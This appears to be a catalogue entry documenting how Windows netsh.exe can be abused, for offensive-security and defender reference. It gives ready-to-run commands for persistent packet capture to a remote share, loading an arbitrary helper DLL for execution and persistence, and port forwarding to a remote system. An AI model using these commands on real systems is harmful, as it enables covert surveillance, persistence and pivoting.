--- Name: Netsh.exe Description: Execute, Surveillance Author: '' Created: 2018-05-25 Commands: - Command: | netsh.exe trace start capture=yes filemode=append persistent=yes tracefile=\\server\share\file.etl IPv4.Address=!() netsh.exe trace show status Description: Capture network traffic on remote file share. - Command: netsh.exe add helper C:\Path\file.dll Description: Load (execute) NetSh.exe helper DLL file. - Command: netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 Description: Forward traffic from the listening address and proxy to a remote system. Full_Path: - C:\Windows\System32 - C:\Windows\SysWOW64 Code_Sample: [] Detection: [] Resources: - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md - https://attack.mitre.org/wiki/Technique/T1128 - https://twitter.com/teemuluotio/status/990532938952527873